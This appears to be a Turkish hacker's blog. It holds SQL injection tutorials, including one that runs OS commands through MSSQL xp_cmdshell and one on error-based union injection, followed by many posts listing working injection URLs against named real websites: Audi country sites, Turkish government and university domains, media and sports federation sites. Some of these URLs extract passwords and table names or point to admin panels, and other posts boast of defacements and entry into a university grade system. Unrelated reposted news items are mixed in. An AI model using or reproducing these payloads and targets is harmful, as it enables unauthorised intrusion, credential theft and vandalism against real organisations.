mssql'de c:/ d:/ dosya okuma

s.a

arkadaşlar mssql de c:/ d:/ e:/ v.s den dosyaları okumayı anlatacağım.

öncelikle okuyacağımız kısmı seçelim d:/ yi okuyacak olursak.

şöyle yapmamız lazım.

d:/ içindekileri bi tablo oluşturup içine koycas sora o

tabloyu okuyup bilgileri ulaşcas mantık bu.

şimdi oluşturalım

http://nesa.com/nesa.asp?id=1;drop table tablonesa

create table tablonesa(ID int identity,columnnesa

varchar(1000)) insert into tablonesa exec master..xp_cmdshell 'dir /b d:\';--

tablomuz: tablonesa

columnumuz: columnnesa

şimdi okuyalım.

http://nesa.com/nesa.asp?id=1 and 1=convert

(int,(select columnnesa from tablonesa where ID=1));--

where id=1,2,3.... v.s gider bölece okumuş oluruz :D

soru olursa burdayım

kolay gelsin

msn@thenesa.com thenesa.blogspot.com

by TheNeSa

error based mysql Anlatım

her gün error based mysql hakkında sorular geliyo ve

bende bi döküman yazim dedim.

error based mysql de genelde site hata vermes siz sitedeki

değişikliklerden yola çıkarak column sayısını bulcaksınız.

nasılmı birasdan görces.

Öncelikle sitede açık olduğunu nasıl anlıcas.

sitemiz

thenesa.com/nesa.php?id=1

olsun.

site sonuna

thenesa.com/nesa.php?id=1'

(tırnak) koduğumuzda sitede değişiklik oluyosa yazılar felan

gidiyosa bişeler vardır :D

sora site sonuna and 1=1 ekliyoruz.

thenesa.com/nesa.php?id=1 and 1=1

ekledik şimdi sitenin sorunsuz açılmasını beklices.

sorunsuz açıldığını farz edelim.

şimdide sonuna and 1=2 ekleyelim.

(neden and 1=0 değil de and 1=2

bazı sitelerde and 1=0 sorun çıkarıyo

bunu kullanırsanız sizde görürsünüz ;) )

ekledik sitede yine bazı yaızlar gitti felan değişiklik

olduysa demekki sitede error based var.

hemen column sayısını öğrenelim

order by kullanıyoruz.

thenesa.com/nesa.php?id=1 and 1=1 order by 1,2,3,.... v.s

column öğreniyoruz aynı mysql gibi yalnız şimdi bide

extradan and 1=1 kullandık peki nezman durcas hatamı alcas hayır

bunda yine sitede değişiklik olup olmadığına bakıyoruz

yazılar felan gidiyomu değişiklik oluyomu biliyosunzu error based de hata yok.

nese column sayısınıda bulduk.

şimdi union çekelim :D

column sayımız 3 olsun.

thenesa.com/nesa.php?id=1 and 1=1 union select 1,2,3

yaptık ama column lar yansımadı

işte şimdi id yi değiştirmiyos burda

and 1=1'i and 1=2 yapıyoruz.

thenesa.com/nesa.php?id=1 and 1=2 union select 1,2,3

ve işte column'lar yansıdı. gersini zaten biliyorsunuz.

tablo column almayı mysql anlatımda anlatmıştım.

aynen onun gibi

ha bide sitelere göre sonuna "--" , "/*" ve column

aralarına boşluk , "/**/" , "+" vs. deneyerek bulun bunlar siteye göre değişiyor.

nese benden bu kadar bişe olursa saten soruyosunuz.

ben burdayım herkese yardımcı olmaya çalışıyorum.


msn@thenesa.com thenesa.blogspot.com

by TheNeSa

www.peugeot.com.sv Hacked !

siteler:

http://www.peugeot.com.sv/

http://gevesa.demo.com.sv/

mirr0rlar:

http://turk-h.org/defacement/view/333359/peugeot.com.sv/

http://turk-h.org/defacement/view/333360/gevesa.demo.com.sv/


by TheNeSa

www.fiat500.com.tr Hacked !

Site:

http://www.fiat500.com.tr/

mirr0r:

http://turkey-h.org/defacements/?id=74877


by TheNeSa

Türkiye Müteahhitler Birliği www.tmb.org.tr sql injection

site:

http://www.tmb.org.tr

sql injection

http://www.tmb.org.tr/genel.php?ID=-10%27%20union
%20select%20group_concat
(column_name)+from+information_schema.columns+
where+table_name=0x7579655f69736c657269/*

işşte tablo adlarıı giren girsin.

kolay gele.

by TheNeSa

Audi Bulgaristan www.audi.bg sql injection

site:

http://audi.bg/

sql injection:

http://audi.bg/news.php?newsid=689+and+1=2+
union+select+0,1,2,@@version,4,5,6,7,8,9,10,11,12,13

buda version 4 tahmin edin :D

kolay gele.

by TheNeSa

Audi Avusturya www.audi.at ve subları bg.audi.at ve cms.bg.audi.at Sql injection

site:

http://audi.at

http://bg.audi.at

http://cms.bg.audi.at


Sql injection:

http://audi.at/news.php?newsid=689+and+1=2+
union+select+0,1,2,@@version,4,5,6,7,8,9,10,11,12,13

http://bg.audi.at/news.php?newsid=689+and+1=2+
union+select+0,1,2,@@version,4,5,6,7,8,9,10,11,12,13

http://cms.bg.audi.at/news.php?newsid=689+and+1=2+
union+select+0,1,2,@@version,4,5,6,7,8,9,10,11,12,13

version 4 ler tahmin etmek lazım..

kolay gelsin.

by TheNeSa

Audi Romanya www.audi.ro sql injection

site:

http://www.audi.ro/

sql injection:

http://www.audi.ro/news.php?newsid=254%20%20and%201=2+union+select+0,1,2,@@version,4,5,6,7,8,9,10,11,12,13

version 4 tahmin etmek lazım..

kolay gelsin.


by TheNeSa

mebsertifika.sakarya.edu.tr Hacked !

site:

http://www.mebsertifika.sakarya.edu.tr/

mirr0r:

http://turk-h.org/defacement/view/332122/mebsertifika.sakarya.edu...

by TheNeSa

Erciyes Üniversitesi Hacked !

Site:

http://fef.erciyes.edu.tr/


mirr0r:

http://zone-h.org/mirror/id/9096180



by TheNeSa

Türkiye Yelken Federasyonu Sql injection

Site:

http://www.tyf.org.tr/

Sql:

http://www.tyf.org.tr/news.php?id=-397%20union%20select%20@@version

version 4 tablo tahmin etmek lazım büyük ihtimalle basit bişedir.

buda panel :

http://www.tyf.org.tr/admin/login.php

kolay gelsin

by TheNeSa

www.kanal7.com.tr sql injection

Site:

http://www.kanal7.com.tr/

Sql:

http://www.kanal7.com.tr/duyuruDetay.php?id=9%20and%201=2%20
union%20select%201,group_concat(table_name),unhex(hex(group_concat(table_name))),4,
group_concat(table_name),6+from+information_schema.tables--

işte tablo adları admin tablosu yok saten panelde yok belki
işinize yarayabilir ne sql die sormayın blind mysql.

by TheNeSa

Çinde Uygur Türklerine Yapılan işkenceler

Birçok kişinin bildiği bir olaydır bu. 1,3 Milyarlık Nufusu olan Çin Halk Cumhuriyeti yıllardır oradaki bir avuç Uygur Türkleri‘ne yaptığı işkencelerden bıkmamış ve halkınıda onlara karşı kışkırtmıştır.Son olaylar ise iyice işi çığırından çıkarmış ve bir çok Uygur Türkleri devlet ve çin’li insanlar tarafından öldürülmüştür. Hatta öldürülmeye devam ediliyor.Çindeki şuan yaşanan kaoslarda 150 kişinin hayatını kaybettiği ve 800 kişinin ağır yaralı olduğu ifade ediliyor.Tabiki bu sadece medyaya yansıyan daha doğrusu Çin’in devlet adamları tarafından medyaya yansıtılan kısmı.Çindeki bazı kesimler Çin hükümetinin olayları örtpas etmeye çalıştığını ifade ediyor.Çinlilerin ve Çin polisinin işkencelerine maruz kalan oradaki Türk kardeşlerime dualarımızı esirgemiyoruz.Allah yardımcıları olsun.

kaynak:vazgecilmez.org

by TheNeSa

ÖSYM, ÖSS sonuçları için gün verdi

14 Haziran Pazar günü yapılan Öğrenci Seçme Sınavı sonuçları için geri sayım başladı. ÖSYM tarih verdi..

Öğrenci Seçme ve Yerleştirme Merkezi (ÖSYM) Başkanı Prof. Dr. Ünal Yarımağan, 2009-ÖSS sonuçlarının 12 Temmuz Pazar günü açıklanacağını bildirdi.

Yarımağan, YÖK Genel Kurulunun bugün aldığı ''ÖSS'deki baraj puanlarını geçmeyi kolaylaştırıcı'' yöndeki kararının ÖSS'ye giren 80-100 bin adayı etkileyeceğini söyledi.

Yarımağan, AA muhabirine yaptığı açıklamada, 14 Haziran Pazar günü gerçekleştirilen ÖSS ile 21 Haziran Pazar günü yapılan Yabancı Dil Sınavı (YDS) ile hesaplama çalışmalarının son aşamaya geldiğini bildirdi.

Ünal Yarımağan, YÖK Genel Kurulu'nun bugün aldığı ''Öğrenci sayısındaki azalma, kontenjanlardaki artış ve bazı testlerdeki soruların güçlüğü dikkate alınarak bu yılki sınavda 165 taban puanını yüzde 20 ortalama net başarıya, 145 taban puanını da yüzde 10 ortalama net başarıya eşleştiren bir düzenleme yapıldığı'' yönündeki kararla ilgili öneriyi ÖSYM olarak kendilerinin YÖK'e sunduğunu ifade etti.

''Bu karar doğrultusunda puanlar yeniden mi hesaplanacak?'' sorusuna Yarımağan, ''Biz puanların buna uyarlanmasını yaptık bile. Bu kısa bir iş. Zaten biz bu kararı YÖK Genel Kurulundan bekliyorduk. Çünkü öneri bizim. Birkaç seçenek sunmuştuk, YÖK de bu kararı aldı. Bu, barajın geçen öğrenci sayısının artırılması anlamında. Çalışmalarımızı yaptık, sınav sonuçlarını pazar günü açıklayacağız'' yanıtını verdi.

''SORULAR ZOR OLMUŞ, KONTENJANLARDA ÇOK BOŞLUK KALABİLİRDİ''

Bu kararın kaç adayın barajı geçmesine imkan sağladığı yönündeki soru üzerine Yarımağan, şöyle konuştu:

''ÖSS'ye başvuran öğrenci sayısı geçen yıla göre 195 bin, sınava giren öğrenci sayısı 180 bin azaldı. Örgün öğretimdeki kontenjanlar da 90 bin civarında arttı. Bunun yanı sıra birkaç testte de sorular biraz zor olmuş. Sorular mesela, Türkçe testinde geçen yıla göre zormuş. Bütün bunlar bir araya geldiğinde kontenjanlarda çok boşluk kalabilirdi. Bu nedenle böyle bir karara gerek duyuldu. Bu karar, 80-100 bin öğrenciyi etkiler.''

Prof. Dr. Ünal Yarımağan, şu anda detaylar üzerinde çalışmaların devam ettiğini belirterek, ''Birkaç gündür bu kararı bekliyorduk. Bunlar programlı şeyler'' dedi.

kaynak: haber7

by TheNeSa

Firefox 3.5'da hayal kırıklığı!

Mozilla, Firefox 3.5'u tamirhaneye çekti.

Şirketin yaptığı açıklamaya göre; bir çok hatasından dolayı, Firefox 3.5 tamire alındı. Kullanıcıların hatalardan rahatsızlık duymaması istendiği için çalışmalar tam gaz devam ediyor.

Sık sık tekrarlanan hatalardan arındırılmış Firefox 3.5.1 versiyonunu, Mozilla Temmuz’un ortalarında piyasaya çıkarmayı hedefliyor. Birçok uygulama gibi, Firefox da hataların kaynağını anlamak için kullanıcıların desteğini bekliyor. Sistem çöktüğünde, raporlama yöntemi ile bilgiler, tek bir merkezde toplanabilir.

Hatalardan her birinin tamiri için Firefox 3.5’da ilk defa kullanılan, daha yeni ve daha hızlı bir JavaScript motoru olan TraceMonkey programı şart görünüyor. En son ortaya çıkan sorunlar, yeni sürüm piyasaya sürülmeden önce giderilmişti.

Bu durum tabii ki Mozilla için pek de alışılmışın dışında değil. Daha geçen yıl Firefox 3.0’ı piyasaya sunduktan 4 hafta sonra şirket, benzer problemlerden ötürü aynı şekilde Firefox 3.0.1’i piyasaya çıkartmıştı.

Mozilla’nın yaptığı sayımlara göre, Firefox 3.5 çıktıktan sonraki ilk 36 saat içinde yaklaşık 6.5 milyon kez indirildi. Tabii ki bu rakam ilk 24 saatte 8,3 milyon defa indirilen Firefox 3.0 sürümünün önüne geçemiyor. Buna karşın; Apple’ın Safari programının ilk 3 gününde 11 milyon defa indirilmesi ile karşılaştırılacak olursa, muhteşem bir rakam.

Firefox 3.5 sürümü; Windows, Mac, Linux programlarında 58 farklı dilde kullanılabiliyor. Mozilla’nın resmi sitesinde, yardım (Help) menüsünün altında ki “Güncellemeler için kontrol et (Check for Updates)”i seçerek gerekli güncellemeleri yapabilirsiniz.

kaynak: pcworld

by TheNeSa

www.bartin.edu.tr Hacked

site:

www.bartin.edu.tr

mirr0r:

http://zone-h.org/mirror/id/9060511

not sisteminede girdim :D isteye düzeltebilirim :D

by TheNeSa

www.dtp.pl SQL

Site:

http://www.dtp.pl

Sql:

http://www.dtp.pl/noweprodukty/index.asp?id=185
+union+select+0,password,2+from+users

Panel:

http://www.dtp.pl/admin

yalnız panel şifrelenmiş geçmedim :S

by TheNeSa

www.ksm.gov.tr SQL

Site:

www.ksm.gov.tr

Sql:


http://www.ksm.gov.tr/ilan.asp?id=169+
union+select+0,user,2,3,4+from+users

by TheNeSa

www.milliparklar.gov.tr SQL

Site:
http://www.milliparklar.gov.tr


Sql:

http://www.milliparklar.gov.tr/Ayrinti_ayhd.asp?haber_id=187+
union+select+0,1,2,3,4,5,6,7,8+from+admin


by TheNeSa

S.a arkadaşlar uzun süredir giremiyom

arkdaşlar lise 4'e geçtim ve öss var biizmkiler ders çaloışmadığım için neti kapadı bu sebeple giremiyom burada yorum bırakırdanız gerekli cevapları girdiğimde veririm yardımcı oluyorum saten görüyosunuz elimden geldiğince çok güsel siteler var ama zaman yok bu arada nic.pr yede girdim :D her an dns deiştirip bikaç domain hack'e hazır :D benzer süper siteler var yakında görürsünüs saten :D nese kibakın görüşürüz bu gün burdayım azcık :D


by TheNeSa